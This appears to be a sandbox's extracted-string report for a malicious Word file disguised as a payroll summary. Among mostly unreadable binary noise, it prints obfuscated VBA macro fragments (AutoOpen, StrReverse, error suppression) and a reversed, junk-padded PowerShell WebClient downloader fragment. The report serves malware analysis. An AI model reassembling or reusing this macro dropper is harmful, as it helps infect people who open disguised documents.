(09172 Payroll Summary.doc.bin)
RisETDerphfhQtFhPvTnvcVPnOHXLNYmLz$lClboXGRFEQxJHMYm2lOcjI6ocHjsCORiiJIhLqEdjvqpbDnMofSdjBZZCrlzfvbLjgoKuzmf?EsQSpiDvLwDDsGPRq/MYsjljEiTmBHV*UKbTjUAPPcjpIfjwDD[SfmlvKqJohGm-whVRzsWDXtiHULSuHBvj1HqLkvVSjBLWzAYzrqFaaCOYjzlFUpIjCcUBpK0PMijjPSGBNvIhTrYUkjLnzlWWDQzfNYh%RiTzT,]NaPLIclNUtiYrVYRzaviL\wcjSmCDFNoTZWVKNuvDwphLsNDXRHiUftWaYQfkXlWuiozAuulaJCijwZiwN{Sqdff%KzRFfw&KtUTfzJjaiL2twJJsRiAhrfacRsvkpdFCziPzTiRwIwnmoZIZwHcsnbAekhSiibHDDVDGshzzliYByzdJvIzzpiBXdbPjQrzYEpuoGc&DzknDPaiSMGjEVUXjlWBNcTOqzhjolOqKEHawjLinabzyLtbczArumErldmHzmwAKYUBDoPAlof]JmtKfQNUjTpWHKioOotoZc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RIwBU1QAGBSf
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rkquEpwbjk@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RpuUHXTcAHY
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rqMrZ@(YKZjUcECKSBN7099WUHVW(1( FXCwA(33539zjCdd45861(IzRJC(2ewcJoXF' WFWCL'cNawKTwH@(DdT2swdMLdmXo% 3pKc53470y, NTnXnUHGTIo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rrVlUBD#fWfv2YGsrtP`pJZwXjT6 AJEzaG# 96275"SiYVY89456KVjLIA1rWQZPhSwBkqBW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rstdole>stdoleP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rtXQXAREzJhfsVddbV"028A>u FrIKY25}RjsEOC;9595cUtHQjqA 99%*@ GPEBlF0402aPuuPBWOFzFa4f BZnrWRPRf CkMmpl`Mid(qltFWbbrUwKwh`#+ QiKjlfM, ojWaqIpCHFdcuR@B`zciEwvSVjCilFCCEGirwJjw@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RuDYLd(UuzVAASwmuIka466CnfC`48060
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RusqwWVLvDTIdIiwmKKiBzNapzaifiQVqpwQXX<rvBKkyMtWmS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rVCNdTQfATY-kGJhQp75556O@lUZwbn>28463PoIqwGP39652AHbfEl6638OwvTOMwP23937PkvRQF0O cPBjJOEnd musHwkwosI(oXmdLMdsYfUoN As uingOn Error ResuNextlscbakuCGkl
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RwuZiEuUQ"JbJH(CRfIMZqiN!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rYT<K.KR)n#n%OkDHt6=Bk'RF!)Iw#X'(Mss[/m9j~&tsN?%bJ}TUqVuiKRG/8Y\cax\$m%zQ{[?v<t>c3A#8 W<aj=zs#5&8PybP82N+hzIF5X@K91j=ake5R%FV!Apx0ZZj/3z}/d81c~Y!lT&c-Zj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
rz'4u/9+9KXT)1sQg{Q^}__|5VO>\6qGl+Gi3?YRjX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
r{_G,HMg2}ZUa=x,8YycuK#`>J!R9 AxM;V{_?*rpG#mLgFkX]2&x&>kR}Ex6}d5iU+>7bgR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
s6VTGHTG% tGqjH2LX!!!!$'V Z'X ^ `(! b dxXX fM hX j lX'\ p'n t vj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
S?,$Zn^VVVVVVVVVProject.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5&.[`)TahomaC.,{ @Calibri LightACambria Math"hee!r0@P$Pn^6!xxIRyfewu59531.+,0hp|
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SBSq/= RzJKH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sHiwkDEW6ZZJqm4tBp1^74},!`"a1"@hzjsfJkzwQuV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sJmwrY tvOwd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SNvjhVSMiqFw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SoClboX(GRFE!XJHMYmlOcjI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SqfOR!cBJZxSFtVNwN@H/ :GXjDU"@20&Q TwzsIE28108ZFGff2638! 4Ln:3S:zW0SjJQ% ?LKUKjPWqjNAcd;07zsP$+]4[emOHsp$ ( .ta9.`3684N1Aa3b, E11N`hMcobpmUQrU
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SQQFY(7uQGmbTbotjvPSs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SQu.EozMFTWzaojzGLMGX3&3&3&3&$'X ' 9 T cXX !X X'@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sRCFDzprwV+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Srye.T1%$rf 9]m/m;Pr-qmp8e
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sSXzHN(bhVZKVPDnCk`68030;OVIHH;37582(nBaUq9634c@rtdawG52135@;RKhJb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
stdole`Project-ThisDocument<_EvaluateNormalOfficeuDocumentjzTZADLcFXJtFREGuJqoJpuIvtSfWYTPG<NfmOGUlKuOrzhISt$MKOVLlQzuPmq)kbHukTejNjBO]qNFaHudJaQNjqQicmVO>BYJoKKiIfwim$lopfK|{mRhiW4LjTjDOMkrMhQSUnTBuUj1zbozbioTumDwlYbhlCiGZMaRmJmoo;"ruGmcH sndOl_tIcSnzu_aUPkBzwYhkAPuVUiVuYjTvzp]nTVotWfWlij\LCdzbMJztozYtTmLOALkNOLVSLhiwzIiztQSwOW%pWcAtQULjaXuzoSdIzwkJCfnBnzrfuvKczvdmOBwXcAnFVfqXCqrnrjKcYQzFC5BIFNM1CvBjAJqSsVAEtUkMEcTFpkw2sUwQSdlvpGqaI7CQvmImBTjOwFajjIzvFaiDYuFSTqVn\DfRGEPwtbt?ZZHrAjziUIEOnAQYaSCERCsuq"PDJiVjGZJjpli(|rjKbzvCTYcvDpAutoopen*wnuHwn5ujzKhwOucKHhDKJkO_EAqJsl>UWmhnTLjztnYvRAWudJsLiEGZfYb'IuXzPk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
StrReverse
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sub HqLkvVSjBLW()
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sub sVdSGF(PhpwT)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sub VIAJOC(BwfLOI)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sWpHhLJcnuA-mJvvN808094OuIwjCQO29665OOMbhz!O8851OUavTI59325OuMpYuO 93545ODt0aXZB0OtpnqaObXSsKjjnooiRQpJm("cRkY soLFNFiN dw4kmS1813G54137)zwAFz&OoUAt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
sXnOYfp%7959C_wpDXFY85291fwumRn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
SYljbX(mOvZAzHirjzQBA28827FAPozbPw>8760*UtiMOrP988=caVQkud 17490QIrwmPk4258QAqpjd0%KRdhJtP`rqYwXIVi7LLkVNwWksWbmhl % t7w8246813+, 15DqnjriJizQUq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Sz+S9%c?o}GH-(ws:p.?J[akg
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
T tNmqd(KUKT@XsJakD16012yhPDwLk<`51920/<h`zitjl@-12041BHwJT32358=mdzuaOA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
t@a8^.VJR?Qa+\Oc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TdLY(PZQmLAgAs14623@JcgjCiCI6421FgrJzVl@74bKBESf8!KQjqTBt19!gDDDz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tdWGzM(szzHtc / hCdBu60563Fix(iXLof)) + 7886 - CLng(JXYOGS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
theme/theme/_rels/themeManager.xml.relsPK]<?.xy version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tiQwRHh=%@zNafst4p6084@a, %mNjOaaUXWtt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TitleRyfewu38887
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tKTwcDi04p}XniG134ArIEnoI2ZnhfjyAjCpwB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tlzjqa1582HIidZ2ab13$KsYaiA645A_QiEamz76961XbizsD7682b0DBrJAsuAOb dUbwaH@AmiVCT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TmBHV@UKbTjU1972APPcjpe?0f4fjE|423c4fmlvA|69JohG2mu65}1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tRn6Ns$f`7I&?Sffk&mwL#wQQS{KX!:io|mn3$0X2
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
tThBtb = SvSMo
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TX X' ' J RN ^XX 6 "eX $ &X'\ ^it.wes&&w^o=pJz56$'( ,'* 0 2q 4AF 6XX 8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
TXX 6F 8P~X : <X',X @'> D F HTr JZXX L7_ NX P RX'Bi` Z'X ^ ` b d!XX fr hFX j lX'\' p'n t v"K x2 zXX | ~)X X'rb.8Z ' + Z XX Yp ][X X' ' 1 nXX u fX X' i ' KQ ,XX rg leX X' ' W7 3 6XX yX X'Xi.%@S5i V/ %^c^EzK;;;;$' ' U: 3[XX bK +X X''X ' x TY tXX #1X X',74Ep^S^m^ojf@llll$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u/L&{!lcl&s^E]A5u~1g{@"`F)[s)[#6/\G6cw(#h,;_k73U1:N+<Z(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
U0Wifd$Kit.wAw^o=pJz560697+ J#n"bDbQj qZzIDtoBXZSfokzjhiA29q$jGfzh3dcaYAmT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u4@LBjp$cAp50* TlfEv7405jSYZD@wnCKuX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
u6KB#_vz~gz3NH/da1glQ@?}=n'N:x{Dy=v_oS8kG[sm>lGf=c-|s
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ucGjY (sAAudOpqqEZ@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uHZzwCEKUaprJDOa5347JqTkJ2227|tooRWqq!6628|MijI+ 9251* jJtpE"N889bOMEuQopnvJQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uIpNwjvi=75, 75, 1435, 743,
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uIvtSiIfwimcYQzFCvzDYBBHwnuQGarU01Y
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ujj%bz|ag9|<kxRX~b-PC|!y5-bKID5q
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uMkUH(YMHEvAjKbXHX60480Fix(WtYaRY50986PSrYDwio;40718 DnOFX96340yZdQDHy54232yoKiRYS1AtqRzSPM BJkOrIRQYjQBdEVcQpbiimJ@pqmJNu51Qjcrbi>1760PTNOmwQP20585JVoljLA64293QWbPBQQ6119QLomER4APMttXKPupLfisAzi@%DespnZBf%!!%RsCO ukicie31h8415, eRQAMCdnZJu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UMWrAHbUaicddrpmoVqWMOhSpCi6u (.ja6 )sRAHC[0,5 ecalpeRstRQ`,)47]CP[+189rC[( 29!C[,PP9C eCAlpE`r0- 43@)211]c#3h10512 ,2 %18FdpQzOQVmNKWv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UPivBwFXrSbNYwTHwBtsUDDJitRhYQQJrhdAqJBVYaXJUhcqo;SfnVuYKEbwBXkj\fKobWavjbB}orkXz*jWmELDLiDUAqrTXdVLzcrZavjNbJPbXbz>IASBuRLFpzaQUivoEgOLwJkRAMzoLVUwiYRNUvvXphj>WjjtpTDSGIPrKNWlUgJBHVtrSGKvzo?FfBMtENptTJ^|OSfpbfZWJsbplcps.qiTAkE*IoLNdUUUPpj9FrUSpqSNvjhVSMiqFwnIhzGNEV bAYlptYJAGLp!_vOEVSHKOKCaLjjowa9xWzsjOXiPcIlBslOTNhiDbVWb@mNjOa(wUXWttirGdjsozrjmwDdtbirDh0aIOdJrzIWi4BtvOCWluhzQWlpjSMlHisAZ4MnREwPaJliTCVboucEdciAiQY6@rwvzzrzzdIJJJTjUFmkuzoGdnKYZjKpjjBpzzPUTjChvzqmAkSWEVfFTCHqHDClzMKpHXjclqmOWluKp%iVabFr"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
uQAuA3moDYX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UqMcbtRa6543ARMpuszV##zpYkToPa2k`jmSULQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
UwQwjLoXpbnm/PJHhSw`24920CdnkJ|90541PbirYCvP74157 fWjmN81529PjWnJtkQ46208QKjiRvn1AQwCpwvQEnd Sub
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
V$@s.smG$i;<3i[Bm U+UXkpGoc)vb#?3'>~ONHi'=z^(0CYs_C}VPj*\c-q8|.et{6
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
V@GlobalSpaclFalseCreatablPredeHclaIdTru
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ve\GJAw1CoOj7~spEsAegk46qYf#DN#EWtq=~b]9r:8,5;"(,!mS3m:o
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VersionCompatible32="393222000"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vfrMRtjSaVBtVInzj108940CZvXL6842gQSQ18436BwKHnwL`927* UZwzve9194FQvXcaB@SRuhuM@JPimhzLJTckOfWrnZBf% tes&&r^e=%Sf.W,3545u!e65a3D1Gb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vfR{Zm|wL3g#TF]OIZ<K6Le/DGdQYO|1!]B$hVk_
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VFzQF`3119WDRoX 72773wuRHknYqjiZKSpWMfD4vv0vssBOBL!JA76976@$BCtidBbOtYhs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Vi7LLkVNwWksWbmhl% t7wL L L L $'x
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ViFQic dowlFKYHDjhPL@PFpRWWzPHvPqrDO GFFzXItVWakEMIAAA6sRCFDwmk+ RusqwWVLvDTIQUKjPWqj&N1$+ F+ ljaakrr@ZWhhiPzoPEoHkRptMMvPYQQp+ S+ LshK!:+ w dBSwU0JHpwdEsFLpHcUuaI@cwAkETD ANzhppwCffb+aYof@qzcWsEPUMWrAHbUZiFiTzufdJWjr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VPdkoaGizFU zjsuLa!6420Ehwzww52oBbBwQ7476ceICzIr@@2!QdNSiR!e22492b2Oj0QiqcBZQilljRccwGTKaV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vpzrC(dnYzSo /@ LZDwv617/ Fix(wcMOuZ)B)1964CLng(SAsTj69846A#ALwBq22682 * BPTjwCStr(51368)`kmJjNRA=djzcpocTvjwpnRYv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vrDjvITiwAlCa?LshKN'hBTLEd9riDVWs+XlCQGRscnSl+iZHfv^jNQbGmMANYPtujfkZjsTMWXZJYWJUbKQTbjBihNL/oaCbzNe(wVTSGI7PFHVrL^HJhvsO+GwRUlTcbOZZsXkRCRELWzDh:fEwpAxVAmWLiQcwAkETDljGSmk9utKLaLs8jmvUhDwvJaksuWwvrrEDNSgKUdmwLiFRoZrlTzrBsHwefUWrsrHPEfnoCahOjHjokjBVZSKqawnkYHQwQPtHIgvWmWIzoIGYvGaOiQjKOpJOTrlavccWUsnwCswQ$dANzhpidAEH,CjcXvWpHwMtiTUNdvoLbmOtrjjLJDonTFQrrjI]wnRAEfatNhji:[YkDiSJFlZMhf=XfzUiiEUGNS4YjGiLqfbTvhrvRBovrHldULGcMJmVirAqsTLEnrvUTSRaTQ2kEoHkRTcNAkEM"HlvWmoKnFzRNZhUKO)JtsLBidAGoiTrUIjviMbBCfjZqfjskUINS}jnwKmQBQrOHf MZvXvabURHIVtdUbthjrAmZjmumSbICuazXQsljBFnLTwQUbv3mVrmfhhwfOlF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
vv0vssBOtes&&!Jqqqq$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VYszlQ UfqbZaVFinj88605PjjrjuCQ34342QjvwOEOQ 48952dkSkFB962D96WbIQ12142(VQQcm(JEjAtcmViitp`fTZhC&cs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VYXYa|wFzifn
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
VZSK(awnkA?QwQPtH@116639@vWmWIzb15979oIGYAF17090bOiQj153* OpJOTrAE81761!9vccWnwCswQ@ANzhp&9CGcta%v};EWaerb19;)DCD]St ()JQOme>tIT&-+JDQOk0Q$Oovn(&A@9W`#5291&0d#, %17$idAEHCjcXvW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
w cjSmCmDFNo3ZWVKNu722892mDwphLs[4421mDXRHil28463ftWaYQ 75812lkXlWul52937liozA4l@ulaJCilj wZiwNHSqdff
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
W NRNFUElpob
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
w!1AQaq"2B#3Rbr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
w9CamA^Z[\iw0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wdkd!!%F WraW1f1541AM3f1=iKnMwGCOJki
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WfoHS(Q MjIjWoSHfwP97607PPiXMKP51922P@IvRTjiQ53493YzVXj74165APlhjZJP76315A(RhWTjG@(RvIPb@(oqQpF@$Fjfdr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WGjrDT! fHSpBUGhk2=61@vslbqf1p8670A+!F*B45 bCrjIbJ7312AdFPRMk!F1377BdjzBLj1HBXKFNcBwhXWKd2YZ&p=%TjDEXVkGksKp% @tps2SA29d83 D+ wb,r E19`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wLApZdwfUu TckXYpKLZjArsMnvFvmP\RGbuzpUjwiUEAmlUdJWjrl0SNlESh;mYXolIFYEkfi{jjItiWDLuSKWzfCINZzwuNZjwCGmNdKoOja'iiUYOFBbSXJkcaqDAuFmVUSbi0SqfOR0cBJZhJ3SFtVwzpGjDUnuQTwzsIUZFGffShiTLnzWSjJQlGbuLKUKjPWqjNwhihMcobIdmUQrULnYFkSDXTZ1'JwzGSiUVCTUBjEZjiwdoBqls(OmwfcGGmjAqJDEGXjsJmwrYtvOwdioEiPquj-PbjQwucWXmfQMQnoGJPSXZNYIkwBOcWBwSyIjfaPPSbCoZsZljaakrrp=LOsXhrPCiPoS5NnRmJrPGiswwXgjiIbVOdiOaGAQmwKPiidzAZjUvjVnSzqYnfuQfrAiWNRNFU^ElpobH.iUFQp3RdOvDveKRvcN2ZNwjKAkUrcGwzTuLru=QHSNHMcXLJZwJEjZWhhiPzoPBizmmpH8ozAQWj\,vjYsnnLVHOEuwPwUlHL.PVdVdFi0LLBcCMZQQDYIhuTNrJLXLa$2DPhzERwuFUeiZiEuUQnJbJbxCRfIMRvZqiNuxbudJS*UbopsPyQsAkaXX9lohwuSRKwBpTAJqcr_UMWrAHbUn5adpQzOj|mNKWvJ/rrVlUDfWfvNDYGsrtJZwXjjJEzaGSiYVYTbKVjLI2WQZPhSwBkqBWbfpApzIgkVYwUVnDhfMSPMzGGK[bVBtdeYYFGTaEwaNrZyaWLzXMUjphWnsdIwswDLmbsHCMJHpwdEsFLpHtThBtbISvSMoXisUrtCijidhzLYXfEpWAVujiqjDRC0GBOzwJTQbLt-LIHphHswKjHBsvKXfTBFJmBo"QDtHUpimzjfaptdaLl=zIotHHwXznEmGqrEFjfELiUluXtbqHKlwQvf
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wmKKizNapifiQ@(qpwQXvBKkp9037`+MtWmS+43#&is 813772rphfh30K@FhPvTn260VcVPnOLNYmLzEnd Function
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wNcCA(McNJhG Ywzjk_8V82GhcXvC90jFhSccjapbP?32iGplBP762`+* Ptjoh5710591wLHqZpFHnwEiA!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wOucAq(hDKJk!@EAqJsl532UWmhn208ZTLjBzZ4623Fn YvRAW43627FdJsLiE.6989Z GZfYbIuXzPkmusHwkwosI (ZkVOXNdowlFKYHb`Oalji@scpbMN1pcaOz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wQd%!=%FvIs0ZC////$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wQd%!=%FvIs0ZC655[+ 7y, %3pBYjaT= rCEAEB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wSDqYpBsz....$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wSkUI = (dfavL / XEioEW@49863Fix(TvdJk)) + 62608 - CLng(PlClo(55253FEiZJaV745 * omrRKdStr(78165)ZFzRqc<Dobjcv)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wubDbbz&`DwLrWRw820cSqJYDVT748cHBNL&2JGnlSucID="{90ACCF13-360F-4DB1-AAFF-575E015C6C17}"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WUwtHJRpYL%!&,0@Fwrtttt$'J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WuwUb = UVIJw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
wVTSGI!PFHVrL@HJhvsO`18327aG wRUlT38864
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WwIwcGJiaDnK
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
WYTidzEdmKg~quLvjlMjREU;VGTwfDRHJtJbaKYQvwMBLnkzFVDLauX7MTnlZBMrCbXVt}GvEzWvlRXIMihCX-@iVwzaTPIMNiM0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X X' ' Z & 8XX (x n/X X'swJrwkwHsum%!!%FWraW15{5{5{5{$' ' ^/ T *XX I X X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X X'x z $ ' ~ ' L a vXX OX X'kX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X ` bX'R f'd j lYp n psXX rJ t1kX v xX'h'BZ^c^% & SoEkSiqw2w2Mnnnn$'z ~'| " $ XX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
x'9 z^XX | ~=X X'r9+mU9{QPDR% tes&&JXzpEFJorrplRzoXXXX$' ' ; d XX 4 /nX X' ' XX Y U1X X'mU9+JrwHsum%KGjBBBB$'mU9AmU ' -x O EXX (
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'9f906fDF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UYrrrr$' ' v D XX `W >X "X'? &'$ * ,~ . 0XX 2 4PX 6 8X'(CR7izc[,)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf^^^;^$': >'< B D$ FJP HwXX J L5X N PX'@ T'R X Z] \_T ^(9XX `y3 b>XX d fX'VY76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuSS$'h l'j p rY tgO vXX x zX | ~X'n ' H ?1 mXX g SEX X'07zsP$+]4[emOHsp$ ( .ta9.<<<<$' ' FW B XX `6 X X' ' y @mXX m X X'lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7fzzzz$' ' ` PbXX -& X X' ' / XX t`X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'oAttribute VB_Name = "uIpNwjvi"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X'U9CDT2swdMLdmXo% 3pK$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
X0ZWTcX %^c^E^L@6L6L6L6L$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Xi6ei-n8%eKO=^az>$m$*}0Y#$u\[i
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XisUrt(ijidh / zLYXfE63452Fix(pWA Vuj))b40717QCLng(iqjDRCA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XIWIor = owksP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
xk4Vz;[@-cQ%rxZ.. )OR_h$09ARzGp}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XlCQGR(scnSBliZHfe204714!*jNQbG%8030Hb mMANYPC8296#*tujfk46983*ZjsTMA)93894>WXZJ!sJUbKQTjBihNLoaCbzN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Xwqsp1VpjbAzwDBB1T4662usK jwYwM751985Pudi6N
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX jX X'H2z% tes&&rHBCSAFllQp0kllll$' ' k Y "WdXX $3 &'GX ( *X' .', 2 4e 6 8oXX :V <kX > @X'0 HjwUfYsdMLdmXo%!!%Isoh8W$$$$$'BMZ F'D J L Nj PCXX R9C TX V XX'Ha \'Z ` b% dDA fLeXX hW j X l nX'^ MBDtes&&zsTahziwh48JTJTJT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX X X'o8( ' g XX k MX X' A@ ' { XX L [X X'o( ' = dXX , ,X X'imeZon '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XX t v>EX x zX'j@rnE ~'| b 6 3XX @ EX X'|QXiQwRHh=%zNafst$' ' R: QXX zX X'mU9/ ' DL i N9XX x! X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XXFq&ll=%PInYdOqGm% 57im[[[[$'j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
XZDHt6=Bk'RE$aTbQ;H-#GXY8*\;aYXVQx
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
y"?,.x9]BAjF^}m8A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
y`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
YAzLJjzu = wQpJm("12Ces&&s=%NoUfYsKZ7J", 81392dX13P JVdCmMEKviN
